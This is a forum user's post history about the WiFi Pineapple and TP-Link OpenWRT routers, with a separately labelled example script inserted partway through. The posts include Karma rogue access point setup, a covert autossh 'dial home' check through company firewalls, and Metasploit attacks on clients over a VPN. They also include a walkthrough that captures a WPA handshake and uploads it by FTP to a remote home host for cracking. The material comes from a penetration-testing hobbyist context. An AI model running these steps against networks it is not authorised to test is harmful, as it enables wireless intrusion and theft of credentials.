Razzlerock
Everything posted by Razzlerock

  1. Hey guys. Good work saeed662 :-) Seb, I DO plan on doing a module for the VPN. I tried to create an account last week (on the WiFi Wiki) to submit modules, but I don't think it has been approved/created? Razzlerock
  2. Forgot to mention, the TP-Link MR3020 is available internationally. It's a bit bigger than the 703N, has more LEDs and a 3-way switch. Maybe this is another alternative.... Razzlerock
  3. Hi Darren, I tried to private message you but got an error saying you are not receiving any new messages - you must be in high demand. :) Actually, the 703N (which is the 702N with more memory*) is certified - CE, FCC, RoHS according to the TP-Link website. In fact, you can buy this on www.tp-link.com in the US. My plan is not to stick this in an electrical enclosure at all, I will leave that to the end user B) The good part is, when I get something working on the 703N I am testing on the pineapple too and if it works post updates on the Pineapple forum - that way it is mutually beneficial and everyone wins :) Thanks Razzlerock
     * I need to validate this as I heard this second hand.
  4. Interesting article - the TP-Link routers coupled with OpenWRT can be pretty powerful :-) I'm currently working on a product, due to be released (hopefully) January next year. It basically offers 3 main services;
     1) It's an automated 'quick and dirty' pentester (email/SMS results).
     2) Remote control/penetration testing (think VPN and/or reverse SSH)
     3) Physical surveillance
     This is NOT competition to the WiFi pineapple. I only plan on making/selling 10 of these products, at $100 a piece. Very cool article. Razzlerock
  5. Hey guys, sure thing - happy to share the love :-) I will write up a how-to shortly, watch this space! Razzlerock
  6. Hey all, I posted about creating VPN tunnels a while back, see post below.
     http://forums.hak5.org/index.php?/topic/27765-suggestion-vpn-tunnel-module/page__hl__tunnel
     Note: If there is something out there similar to this and working, do not read ahead. However, I couldn't find something that was working properly. My initial post didn't seem to raise much interest, which really surprised me.
     The pineapple, as it stands, can attempt to attack/exploit clients using modules that are installed on the pineapple. This is great, and big thanks for all those who have developed these modules. The only issue I see is that attacks are limited to what the pineapple can support. Now, I know there are like 1000s of OPKG packages, BUT some stuff like Metasploit is simply irreplaceable in my opinion.
     Enter the VPN. The VPN is simply an extension of the pineapple network to your home PC. I configured a VPN between the pineapple (after some messing around) and my BT5 PC at home. Now, the pineapple has a routed VPN tunnel and my BT5 has full IP reachability to all the wireless pwned clients. Any and all tools supported by BT5 can now be launched :) I successfully tested this just now and was able to pwn a client PC via the VPN using Metasploit (pineapple was connected via 3g).
     I am not saying this is a replacement for modules, but I really do believe this is a game changer for the pineapple - the ability to launch full on attacks remotely from a BT5 machine. Maybe, this calls for a 'mad props' from the main man Darren Kitchen (and Seb) ?? Razzlerock
  7. Hey Seb. It's OK, I did this on a TP-Link running OpenWRT. To save messing up my one and only pineapple, I use the TP-Link WR703N purely for testing. Once I am happy that I have something working on there, I apply it to the pineapple. Although the two are not identical, I have found that the majority of the time stuff that works on the TP-Link also works on the pineapple (if it doesn't work, I know it's something specific to the pineapple build/implementation). Hope this makes sense. P.S. Maybe I should buy a second 'test' pineapple.... B)
  8. As I expected, the fix was right under my nose. Of course, you can put startup commands in /etc/rc.local ! I did this, with a sleep 360 (6 minutes) in the .sh to allow the SSH tunnel to set up properly and hey presto it works a charm.
     root@(none):~ $ cat /etc/rc.local
     # Put your custom commands here that should be executed once
     # the system init finished. By default this file does nothing.
     /etc/ssmtp/ssh-check.sh
     exit 0
     root@(none):~ $
     Thanks digininja, you certainly helped me on the road to get this working - appreciate it man.
  9. First, thanks man I appreciate the help - I spent a lot of time and effort trying to get this going. I simply want to run a script to run 5 minutes after it has booted. This will give the autossh time to connect. My script will then check if the ssh has connected, and if so send an email. I don't simply want to check every x minutes and send an email. Just one email after 6 minutes of power on is sufficient. I hope this makes sense :-)
  10. Excellent, thanks - it worked. Good man! The next problem, it looks like OpenWRT does not support '@reboot' in cron;
     root@(none):~ $ cat /etc/crontabs/root
     */2 * * * * ./ssh-keepalive.sh
     @reboot /etc/ssmtp/ssh-check.sh
     What are your thoughts? I have a 'sleep 360' in /etc/ssmtp/ssh-check.sh to give the SSH tunnel time to connect. Man, I feel so close to getting this working.
  11. The full path to the script is there - /etc/ssmtp/send-email.sh ? Or do I misunderstand you? Thanks for the help, look forward to hearing from you.
  12. Hi guys, I'm pulling my hair out with this! I have a simple script (see below) to send an email;
     root@Pineapple:/usb/etc/ssmtp# cat send-email.sh
     ssmtp destinationemailaddress@test.com < /usb/etc/ssmtp/email-content
     root@Pineapple:/usb/etc/ssmtp# cat email-content
     To: destinationemailaddress@test.com;
     From: myemail@gmail.com;
     Subject: Pineapple has dialed home successfully;
     A check has confirmed you have dialled home.
     root@Pineapple:/usb/etc/ssmtp#
     If I launch this myself from the command line (see below), it works and I get an email;
     root@(none):~ $ /etc/ssmtp/send-email.sh
     root@(none):~ $
     If I add to cron (see below) and reboot, the email is never sent!
     root@(none):~ $ cat /etc/crontabs/root
     */2 * * * * ./ssh-keepalive.sh
     */2 * * * * /etc/ssmtp/send-email.sh
     root@(none):~ $
     The above should send an email every 2 minutes (I am using the 2 minute interval purely for testing). Can someone PLEASE help me? It's driving me mad, surely it is simple? Thanks Razzlerock
  13. BTW, I have tried the @reboot cron entry and it doesn't look like it's supported. Can anyone verify? The plan was to invoke via cron on reboot using '@reboot' and then have 'sleep 600' at the start of the shell, effectively delaying the rest of the script for 10 minutes. This 'would' have given me the desired effect, but testing has so far shown no cigar.
  14. Sorry to reply to my own post but I got this working (except the cron bit). Maybe this will help someone one day....
     root@Pineapple:/usb/etc/ssmtp# ls
     email-content  revaliases  send-email.sh  ssh-check.sh  ssmtp.conf
     root@Pineapple:/usb/etc/ssmtp# cat ssh-check.sh
     #!/bin/sh
     # -----------------------------------------------------------------
     # Simple script to send email if SSH is connected.
     # -----------------------------------------------------------------
     logger "Check if SSH is established"
     if ! ( pidof autossh); then
         logger "SSH: Connection seemed to be down."
     else
         /usb/etc/ssmtp/send-email.sh &
         logger "SSH: Connection seems to be up. Issued /usb/etc/ssmtp/send-email.sh"
     fi
     root@Pineapple:/usb/etc/ssmtp# cat send-email.sh
     ssmtp destinationemailaddress@test.com < /usb/etc/ssmtp/email-content
     root@Pineapple:/usb/etc/ssmtp# cat email-content
     To: destinationemailaddress@test.com;
     From: myemail@gmail.com;
     Subject: Pineapple has dialed home successfully;
     A check has confirmed you have dialled home.
     root@Pineapple:/usb/etc/ssmtp#
     The only part I need to work out now, is if I can schedule to run in cron 10 minutes after a reboot (I don't want it to run every 15 mins.....) If I work this out, I'll let you know. If you know how to do this, let me know. Razzlerock
  15. Hi there. I got this working with the default script, but now I would like to use my own 'simple' script. It seems simple, but I cannot get it to work. Basically, I want the pineapple to 'check' if an (auto)ssh connection has successfully connected (after 5 minutes of a reboot) - if it has I would like it to fire me an email. If it hasn't connected via ssh, I don't want an email. Why do I want this? When deploying on a site, I would like a way to know if the pineapple has been able to tunnel through a company's firewall - in other words, if they are permitting SSH. A simple cron check after 5 minutes of a reboot to check ssh and fire me an email saying it's connected would be beautiful. If I don't get an email, I can assume that SSH is blocked.... P.S. I know I can use 3g (no company firewall restriction) and I know I can check the ssh connection on the pineapple by wirelessly connecting to it - in this scenario please consider that neither of these options are available. I was wondering if a simple 'pidof autossh' could be used? If there is no output (no ssh connection), do nothing. If there is output (see below) then there IS an SSH connection and trigger an email? I'd appreciate a few pointers please.
     root@Pineapple:~# pidof autossh
     1972
     root@Pineapple:~#
     Thanks Razzlerock
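Posts 8, 14 and 15 above arrive at a check started from /etc/rc.local that sleeps a fixed 360 seconds, tests 'pidof autossh' and mails via ssmtp. As an added example (not Razzlerock's script and not a Pineapple or OpenWrt file), this version polls for the process up to a time limit instead of sleeping blindly, so it reports as soon as the process is up and stays silent if it never appears. The script name tunnel-report.sh, the addresses, the poll interval and the 600-second limit are assumptions.

```shell
#!/bin/sh
# Added example (not Razzlerock's script): wait for the tunnel process instead
# of a fixed 'sleep 360', then report via ssmtp. Start it from /etc/rc.local
# as '/usb/etc/ssmtp/tunnel-report.sh &'. Paths, addresses and limits are assumed.
PROC="${PROC:-autossh}"        # process that keeps the tunnel up
MAX_WAIT="${MAX_WAIT:-600}"    # seconds to wait before giving up
POLL="${POLL:-5}"              # seconds between checks
TO="destinationemailaddress@test.com"
FROM="myemail@gmail.com"

# 0 if a process with this name runs: pidof (BusyBox/procps), else scan /proc.
proc_running() {
    if command -v pidof >/dev/null 2>&1; then
        pidof "$1" >/dev/null 2>&1
    else
        for c in /proc/[0-9]*/comm; do
            [ "$(cat "$c" 2>/dev/null)" = "$1" ] && return 0
        done
        return 1
    fi
}

# Poll until the process is seen (return 0) or the limit passes (return 1).
wait_for_proc() {
    name="$1"; limit="$2"; waited=0
    while [ "$waited" -lt "$limit" ]; do
        proc_running "$name" && return 0
        sleep "$POLL"
        waited=$((waited + POLL))
    done
    return 1
}

# Print what ssmtp expects on stdin: headers, an empty line, then the body.
build_mail() {
    printf 'To: %s\nFrom: %s\nSubject: Pineapple has dialed home successfully\n\n' "$TO" "$FROM"
    printf 'A check at %s confirmed %s is running.\n' "$(date)" "$1"
}

main() {
    logger "SSH: waiting up to ${MAX_WAIT}s for $PROC"
    if wait_for_proc "$PROC" "$MAX_WAIT"; then
        logger "SSH: $PROC is up, sending report"
        build_mail "$PROC" | ssmtp "$TO"
    else
        logger "SSH: $PROC not seen within ${MAX_WAIT}s, no mail sent"
    fi
}
# Run only when executed as the script itself; sourcing it just defines the functions.
if [ "${0##*/}" = "tunnel-report.sh" ]; then main; fi
```

As with the original ssh-check.sh, a running autossh process only shows that the supervisor is alive, not that an SSH session is actually established.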
  16. Loving this idea, sounds way cool. Keep us posted on progress!
  17. The 'don't broadcast ssid' doesn't stop the SSID from functioning, it just means that you must 'know' the SSID beforehand or wait for someone to connect to it and then you can see the SSID in the probes. The second command seems interesting. So you think this will effectively disable the use of an SSID but still allow Karma to work? That would be beautiful. Razzlerock
  18. So, this F5U404PBLK Belkin - does it power Sandisk 4GB memory, Alfa NHA AND a 3G? Has anyone got all these 3 running concurrently and with success? If so I will buy one. I assume you just power it via a battery (I have an Anker battery). Please advise. Razzlerock
  19. Of course. YAFC does SCP B) FTP was shown purely as an example....see below (SSH can be read as SCP in this instance)
     root@Pineapple:~# yafc --help
     yafc 1.1.1
     Copyright © 1998-2001 Martin Hedenfalk <mhe@home.se>.
     This is yet another FTP client.
     Usage: yafc [options] [[proto://][user[:password]@]hostname[:port][/directory] ...]
     proto can be either 'ftp' or 'ssh'
  20. Hey guys, just a quick FYI that 'yafc' works very cleanly as an FTP client to transfer files to/from the pineapple and your home machine.
     opkg -d /usb/ install yafc
     I tested this over 3g autossh, capturing a PSK handshake and FTP'ing the captured file to my PC at home for further 'analysis'. Just thought this may interest someone.... This allows you to drop the pineapple near the target, sniff remotely, transfer the capture file and then crack the PSK using aircrack or similar tool - from the comfort of your leather chair at home (if you have one). As mentioned, this was all done over 3g.....
     # Turn card into monitor mode - I used an Alfa external card for this
     root@Pineapple:~# airmon-ng start wlan1
     Interface       Chipset         Driver
     wlan1           RTL8187         rtl8187 - [phy1]
                                     (monitor mode enabled on mon0)
     wlan0           Atheros         ath9k - [phy0]
     root@Pineapple:~#
     # Capture frames on channel 1 (that my target AP is using), save the capture file to my usb stick (/usb/captures with filename 'wpa') in pcap format (so that I can open in wireshark later).
     root@Pineapple:~# airodump-ng --channel 1 --write /usb/captures/wpa --output-format pcap mon0
     # Once WPA handshake captured, stop the capture (CTRL+C) and verify you have the capture file;
     root@Pineapple:~# cd /usb/captures/
     root@Pineapple:/usb/captures# ls
     wpa-01.cap
     root@Pineapple:/usb/captures#
     # Next, use yafc to transfer the capture file to your home PC;
     root@Pineapple:/usb/captures# yafc ftp username:password@myname.dyndns-at-home.com
     yafc 1.1.1
     Copyright © 1998-2001 Martin Hedenfalk <mhe@home.se>.
     This program comes with ABSOLUTELY NO WARRANTY; for details type 'warranty'.
     This is free software; type 'copyright' for details.
     Looking up ftp... ftp: Unknown host
     Connecting to myname.dyndns-at-home.com (x.x.x.x) at port 21...
     3Com 3CDaemon FTP Server Version 2.0
     User logged in
     yafc myname.dyndns-at-home.com:/> put /usb/captures/wpa-01.cap
     /usb/captures/wpa-01.cap
     yafc myname.dyndns-at-home.com:/>
     Hey presto, you now have the capture file - try and crack the PSK..... Obviously there are many uses, but I think yafc is a must for stuff like this. Razzlerock
  21. So, I worked out what I was doing wrong..... *sigh* I thought that the SSID you configured in 'Configuration' (Karma SSID) or using the Network Manager module was for management-only. Therefore, I set this to an SSID I knew, let's say 'my-wireless' with a PSK. I could now manage the pineapple wirelessly and securely with the PSK. This obviously breaks Karma (relies on open authentication). I set my wireless SSID 'my-wireless' back to open authentication, and now clients can connect when they probe for an SSID (Karma kicks in and says 'yes, I'm here'). Is there a way to configure no SSID? In other words, there is no need to configure an SSID because I do not want to use wireless for management. I want to use the wireless ONLY for karma so that clients that probe for an SSID will auto-connect to me. Any thoughts? Razzlerock
  22. Hi legion. Have you managed to configure this on the pineapple successfully? The OpenVPN is 'apparently' supported but I cannot get it to run, just wondered if the PPTP was 'proven'? Thanks Razzlerock
  23. I'm seeing something similar on v2.7. I see lots and lots of probe requests (maybe 50) but only 1 client actually connected. I would say at least 20 of the SSIDs probed are open. Is Karma broken, or is it a client thing? I'd be interested to hear other thoughts, as Karma is 'THE' single most important tool for the pineapple and should be bullet proof. Razzlerock
  24. Apologies for replies to my own post.... but did the 3g script change from v2.5 to v2.7? I re-used the 3g script (below) that was working on v2.5. If someone has the 'default' 3g script for v2.7 please post it (I don't want to re-flash just to find out the default 3g script!).
     #!/bin/sh
     # ---------------------------------------------------------
     # 3G Connection Script for WiFi Pineapple. "Does the thing"
     #
     # Version: 2012-02-17
     # Supports:
     #
     # ZTE MF591 (T-Mobile) -dkitchen
     # Novatel MC760 (Virgin) -dkitchen
     # Novatel MC760 (Ting) -dkitchen
     # Sierra 598u (Ting) -brianzimm
     # And more.
     #
     # Updates: wifipineapple.com
     # ---------------------------------------------------------

     # -----------------------------------------------------------
     # Configure /etc/ppp/options with hard-coded working settings
     # -----------------------------------------------------------
     echo "
     logfile /dev/null
     noaccomp
     nopcomp
     nocrtscts
     lock
     maxfail 0" > /etc/ppp/options

     # --------------------------------------------------------------------------------------------------
     # Check for known usb modem vendor and product IDs then switch 'em from storage to serial modem mode
     # --------------------------------------------------------------------------------------------------
     echo "Searching for attached 3G Modems"
     logger "3G: Connection Script here, searching for modems"
     MODEM=$(lsusb | awk '{ print $6 }')
     echo $MODEM

     case "$MODEM" in
     *12d1:1506*)
         echo "Huawei E398 detected. Attempting mode switch"
         uci delete network.wan2
         uci set network.wan2=interface
         uci set network.wan2.ifname=ppp0
         uci set network.wan2.proto=3g
         uci set network.wan2.service=umts
         uci set network.wan2.device=/dev/ttyUSB0
         uci set network.wan2.apn=telstra.internet
         uci set network.wan2.defaultroute=1
         uci commit network
         usb_modeswitch -v 12d1 -p 1506
         sleep 10; rmmod usbserial
         sleep 3; insmod usbserial vendor=0x12d1 product=0x1506
         sleep 5; /etc/init.d/firewall disable; /etc/init.d/firewall stop
         logger "3G: firewall stopped"
         iptables -t nat -A POSTROUTING -s 172.16.42.0/24 -o 3g-wan2 -j MASQUERADE
         iptables -A FORWARD -s 172.16.42.0/24 -o 3g-wan2 -j ACCEPT
         iptables -A FORWARD -d 172.16.42.0/24 -m state --state ESTABLISHED,RELATED -i 3g-wan2 -j ACCEPT
         ;;
     esac